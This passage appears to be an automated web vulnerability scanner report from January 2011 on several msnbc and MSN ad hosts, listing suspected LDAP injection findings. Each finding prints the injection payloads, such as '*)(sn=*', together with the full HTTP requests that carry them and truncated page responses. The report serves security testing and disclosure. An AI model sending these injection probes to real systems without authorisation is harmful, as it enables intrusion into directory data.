                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
...[SNIP]...

Request 2

GET /_static/feeds/*)!(sn=* HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:26:48 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28632

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1226186690&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1226186690&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></l
...[SNIP]...

2.13. http://rad.redacted/ADSAdClient31.dll [GetSAd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The GetSAd parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the GetSAd parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /ADSAdClient31.dll?GetSAd=*)(sn=*&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC00=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC01=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC02=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC03=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC04=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC05=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC06=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC07=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC08=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
Set-Cookie: FC09=FB=; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:51:06 GMT

Request 2

GET /ADSAdClient31.dll?GetSAd=*)!(sn=*&DPJS=4&PG=NBCNV1&AP=1390&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

2.14. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 567e2b3ee4443fce)(sn=* and 567e2b3ee4443fce)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/567e2b3ee4443fce)(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1203887611&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1203887611&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/567e2b3ee4443fce)!(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=740635654&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=740635654&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.15. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2010/08/*)(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:32:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=470106145&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=470106145&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2010/08/*)!(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:32:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1873517040&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1873517040&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.16. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 67c3b1d04dfaf8d4)(sn=* and 67c3b1d04dfaf8d4)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /67c3b1d04dfaf8d4)(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=524640739&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=524640739&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /67c3b1d04dfaf8d4)!(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:25:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
